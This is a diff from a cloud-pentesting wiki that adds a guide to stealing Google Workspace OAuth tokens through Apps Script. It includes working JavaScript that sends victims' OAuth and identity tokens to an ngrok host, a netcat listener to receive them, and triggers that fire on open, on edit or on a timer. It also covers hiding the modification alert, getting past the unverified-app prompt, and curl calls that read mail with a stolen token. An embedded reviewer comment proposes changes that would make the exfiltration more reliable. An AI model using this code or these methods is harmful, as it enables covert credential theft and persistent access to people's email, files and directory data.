+Start by crating an App Script, my recommendation for this scenario is to create a Google Sheet and go to **`Extensions > App Scripts`**, this will open a **new App Script for you linked to the sheet**.
+
+### Leak token
+
+In order to give access to the OAuth token you need to click on **`Services +` and add scopes like**:
+
+* **AdminDirectory**: Access users and groups of the directory (if the user has enough permissions)
+* **Gmail**: To access gmail data
+* **Drive**: To access drive data
+* **Google Sheets API**: So it works with the trigger
+
+To change yourself the **needed scope**s you can go to project settings and **enable S`how "appsscript.json" manifest file in editor`.**
+
+{% code overflow="wrap" %}
+```javascript
+function getToken() {
+ var userEmail = Session.getActiveUser().getEmail();
+ var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1);
+ var oauthToken = ScriptApp.getOAuthToken();
+ var identityToken = ScriptApp.getIdentityToken();
+
+ // Data json
+ data = {
+ "oauthToken": oauthToken,
+ "identityToken": identityToken,
+ "email": userEmail,
+ "domain": domain
+ }
+
+ // Send data
+ makePostRequest(data);
+
+ // Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions
+
+ // To ask for AdminDirectory permissions
+ var pageToken = "";
+ page = AdminDirectory.Users.list({
+ domain: domain, // Use the extracted domain
+ orderBy: 'givenName',
+ maxResults: 100,
+ pageToken: pageToken
+ });
+
+ // To ask for gmail permissions
+ var threads = GmailApp.getInboxThreads(0, 10);
+
+ // To ask for drive permissions
+ var files = DriveApp.getFiles();
+}
+
+
+function makePostRequest(data) {
+ var url = 'http://5.tcp.eu.ngrok.io:12027';
+
+ var options = {
+ 'method' : 'post',
+ 'contentType': 'application/json',
+ 'payload' : JSON.stringify(data)
+ };
+
+ try {
+ UrlFetchApp.fetch(url, options);
+ } catch (e) {
+ Logger.log("Error making POST request: " + e.toString());
+ }
+}
+```
+{% endcode %}
+
+To capture the request you can just run:
+
+```bash
+ngrok tcp 4444
+nc -lv 4444 #macOS
+```
+
+Permissions requested to execute the App Script:
+
+
+
+{% hint style="warning" %}
+As an external request is made the OAuth prompt will also **ask to permission to reach external endpoints**.
+{% endhint %}
+
+### Create Trigger
+
+Once the App is read, click on **⏰ Triggers** to create a trigger. As **function** ro tun choose **`getToken`**, runs at deployment **`Head`**, in event source select **`From spreadsheet`** and event type select **`On open`** or **`On edit`** (according to your needs) and save.
+
+Note that you can check the **runs of the App Scripts in the Executions tab** if you want to debug something.
+
+### Sharing
+
+In order to **trigger** the **App Script** the victim needs to connect with **Editor Access**.
+
+As summary, if the creator and invited user are **from the same organization** the **OAuth** **token** will **belong** to the **user** accessing the file.\
+If they are from **different organizations**, the **token** will belong to the **creator of the trigger** always with **only the OAuth permissions given** when the trigger was created.
+
+{% hint style="success" %}
+* If you just generate an **Editor link to share with everybody** the App Script will be e**xecuted with the permissions of the creator** of it, so you won't get the token of any user that opens it.
+* If you **invite people outside of your organization** the **App Script is Executed with the triggers creators** permissions (stealing the creators token and not of the user that opened the document).
+{% endhint %}
+
+{% hint style="danger" %}
+* If you invite **people of your own company they won't be asked anything about the OAuth** permissions and the App Script will be executed with THEIR user permissions, stealing their tokens.
+ * An attacker could **add an App Script to a new or existing document** people of the same organization is going to open and **steal tokens from them** without them noticing!
+{% endhint %}
+
+### Abusing Shared With Me documents
+
+{% hint style="danger" %}
+* If someone external **shared with you a document with App Scripts and a trigger using the Head** of the App Script (not a fixed deployment), you can modify the App Script code (adding for example the steal token functions), access it, and the **App Script will be executed with the permissions of the user that shared the document with you**! (note that the owners OAuth token will have as access scopes the ones given when the trigger was created).
+ * If it's someone internal it will be executed with your permissions.... just **share it with an external person and access it from the external persons email** to execute it with the creators permissions
+ * A **notification will be sent to the creator of the script indicating that someone modified the script** (What about using gmail permissions to generate a filter to prevent the alert?)
+{% endhint %}
+
+{% hint style="success" %}
+If an **attacker modifies the scopes of the App Script** the updates **won't be applied** to the document until a **new trigger** with the changes is created. Therefore, an attacker won't be able to steal the owners creator token with more scopes than the one he set in the trigger he created.
+{% endhint %}
+
+### Copying instead of sharing
+
+When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
+If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document:**
+
+
+
+If the user copies it an access it both the **contents of the document and the App Scripts will be copied**, however the **triggers are not**, therefore **nothing will be executed**.
+
+### Sharing as Web Application
+
+Note that it's also possible to **share an App Script as a Web application** (in the Editor of the App Script, deploy as a Web application), but an alert such as this one will appear:
+
+
+
+Followed by the **typical OAuth prompt asking** for the needed permissions.
+
+### Testing
+
+You can test a gathered token to list emails with:
+
+{% code overflow="wrap" %}
+```bash
+curl -X GET "https://www.googleapis.com/gmail/v1/users//messages" \
+-H "Authorization: Bearer "
+```
+{% endcode %}
+
+List calendar of the user:
+
+```bash
+curl -H "Authorization: Bearer $OAUTH_TOKEN" \
+ -H "Accept: application/json" \
+ "https://www.googleapis.com/calendar/v3/users/me/calendarList"
+```
+
+## App Script as Persistence
+
+It's also possible to create an App Script and make it trigger every X time (like every minute, hour, day...). An attacker that has **compromised credentials or a session of a victim could set an App Script time trigger and leak a very privileged OAuth token every day**:
+
+Just create an App Script, go to Triggers, click on Add Trigger, and select as event source Time-driven and select the options that better suits you:
+
+
+
+{% hint style="danger" %}
+This will create a security alert email and a push message to your mobile alerting about this.
+{% endhint %}
+
+
+
+### Shared Document Unverified Prompt Bypass
+
+Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**.
+
+{% hint style="warning" %}
+This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it.
+
+This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document.
+{% endhint %}
+
+{% hint style="danger" %}
+This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\
+To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags).
+{% endhint %}
+
+
+
+Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
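Review bot: The Gmail test command at the end of the "Testing" section has lost both placeholders — `users//messages` has an empty userId and `Authorization: Bearer ` carries no token — so it cannot work as written; it should match the calendar example right below it: `curl -X GET "https://www.googleapis.com/gmail/v1/users/me/messages" -H "Authorization: Bearer $OAUTH_TOKEN"`. A caveat is also worth adding in the "Leak token" section: `makePostRequest` ships the victim's OAuth and identity tokens over plain `http://` to the ngrok TCP tunnel, so anyone on the path can read them, and an `ngrok http` HTTPS endpoint avoids exposing the stolen credential a second time. Because the `nc -lv 4444` listener never answers the request, `UrlFetchApp.fetch` will presumably block until its timeout before the catch branch logs the error, which is acceptable for a one-shot test but slows every trigger execution. Finally, the last hint reads "this also works using `` tags" — the HTML tag name was stripped during rendering and should be escaped (presumably `<img>` or `<iframe>`) so the trick is actually stated.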
diff --git a/pentesting-cloud/workspace-security/gws-persistence.md b/pentesting-cloud/workspace-security/gws-persistence.md
index 5d9909d834..3e4d088fd5 100644
--- a/pentesting-cloud/workspace-security/gws-persistence.md
+++ b/pentesting-cloud/workspace-security/gws-persistence.md
@@ -82,8 +82,8 @@ It is pretty common for Workspace Organizations to not trust by default external
Check the following page for more information about OAuth Apps:
-{% content-ref url="gws-google-platforms-phishing.md" %}
-[gws-google-platforms-phishing.md](gws-google-platforms-phishing.md)
+{% content-ref url="gws-google-platforms-phishing/" %}
+[gws-google-platforms-phishing](gws-google-platforms-phishing/)
{% endcontent-ref %}
## Persistence via delegation
@@ -182,9 +182,11 @@ If you have a **session inside victims google account** you can browse to the **
## **Persistence via** App Scripts
-You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**.
+You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. For more information about how to do this check:
-The docs mention that to use `ScriptApp.newTrigger("funcion")` you need the **scope** `script.scriptapp`, but **apparently thats not necessary** as long as you have declared some other scope.
+{% content-ref url="gws-google-platforms-phishing/gws-app-scripts.md" %}
+[gws-app-scripts.md](gws-google-platforms-phishing/gws-app-scripts.md)
+{% endcontent-ref %}
## References
diff --git a/pentesting-cloud/workspace-security/gws-post-exploitation.md b/pentesting-cloud/workspace-security/gws-post-exploitation.md
index abaf7096f0..8815fedf20 100644
--- a/pentesting-cloud/workspace-security/gws-post-exploitation.md
+++ b/pentesting-cloud/workspace-security/gws-post-exploitation.md
@@ -68,6 +68,10 @@ Some proposed ways to find all the documents:
In [**https://keep.google.com/**](https://keep.google.com) you can access the notes of the user, **sensitive** **information** might be saved in here.
+### Modify App Scripts
+
+In [**https://script.google.com/**](https://script.google.com/) you can find the APP Scripts of the user.
+
## **Administrate Workspace**
In [**https://admin.google.com**/](https://admin.google.com), you might be able to modify the Workspace settings of the whole organization if you have enough permissions.